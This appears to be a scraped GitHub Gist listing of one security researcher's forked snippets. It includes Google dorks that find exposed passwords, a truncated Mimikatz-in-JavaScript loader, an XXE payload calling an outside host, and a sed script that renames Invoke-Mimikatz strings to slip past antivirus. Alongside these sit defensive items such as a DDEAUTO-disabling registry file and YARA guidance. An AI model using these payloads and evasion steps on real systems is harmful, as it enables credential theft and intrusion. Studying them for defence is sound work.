Skip to content

Instantly share code, notes, and snippets.

View P3t3rp4rk3r's full-sized avatar
🏠
Working from home

Santhosh Baswa P3t3rp4rk3r

🏠
Working from home
190 followers · 236 following
View GitHub Profile
@P3t3rp4rk3r
P3t3rp4rk3r / GoogleHackMasterList.txt
Created April 23, 2017 06:11 — forked from cmartinbaughman/GoogleHackMasterList.txt
The definitive super list for "Google Hacking".
admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www” domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
@P3t3rp4rk3r
P3t3rp4rk3r / katz.js
Created April 29, 2017 17:56
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,
@P3t3rp4rk3r
P3t3rp4rk3r / github_bugbountyhunting.md
Created August 9, 2017 04:52 — forked from EdOverflow/github_bugbountyhunting.md
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@P3t3rp4rk3r
P3t3rp4rk3r / XXE_payloads
Created August 11, 2017 06:40 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@P3t3rp4rk3r
P3t3rp4rk3r / disable_ddeauto.reg
Created October 23, 2017 08:54 — forked from wdormann/disable_ddeauto.reg
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001
@P3t3rp4rk3r
P3t3rp4rk3r / yara_performance_guidelines.md
Created December 1, 2017 05:03 — forked from Neo23x0/yara_performance_guidelines.md
YARA Performance Guidelines

YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

  • Revision 1.1, February 2016, applies to all YARA version 3.3+

Global Rules

Global rules are evaluated first. Only if they are satisfied non-global rules are evaluated. This may be useful if all samples exhibit the same characteristics. Use them combined with the "private" statement to suppress a match notification on the global rules.

@P3t3rp4rk3r
P3t3rp4rk3r / xml-attacks.md
Created December 8, 2017 21:08 — forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.

@P3t3rp4rk3r
P3t3rp4rk3r / invoke_evasion.sh
Created May 16, 2018 14:52 — forked from PaulSec/invoke_evasion.sh
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
@P3t3rp4rk3r
P3t3rp4rk3r / annotations.xml
Created May 18, 2018 09:32 — forked from Neo23x0/annotations.xml
Sources for APT Groups and Operations Search Engine
<?xml version="1.0" encoding="UTF-8" ?>
<Annotations start="0" num="138" total="138">
<Annotation about="*.401trg.pw/*" timestamp="0x00056c69af232729" href="Cg0qLjQwMXRyZy5wdy8qEKnOjPmajdsC">
<Label name="_cse_turlh5vi4xc" />
<AdditionalData attribute="original_url" value="https://401trg.pw/" />
</Annotation>
<Annotation about="decalage.info/en/security*" timestamp="0x00056c678a15c50b" href="ChpkZWNhbGFnZS5pbmZvL2VuL3NlY3VyaXR5KhCLitfQ-IzbAg">
<Label name="_cse_turlh5vi4xc" />
<AdditionalData attribute="original_url" value="https://decalage.info/en/security" />
</Annotation>
@P3t3rp4rk3r
P3t3rp4rk3r / kerberoast_pws.xz
Last active November 15, 2018 06:04 — forked from edermi/kerberoast_pws.xz
edermi Kerberoast PW list (XZ format)
This file has been truncated, but you can view the full file.
View raw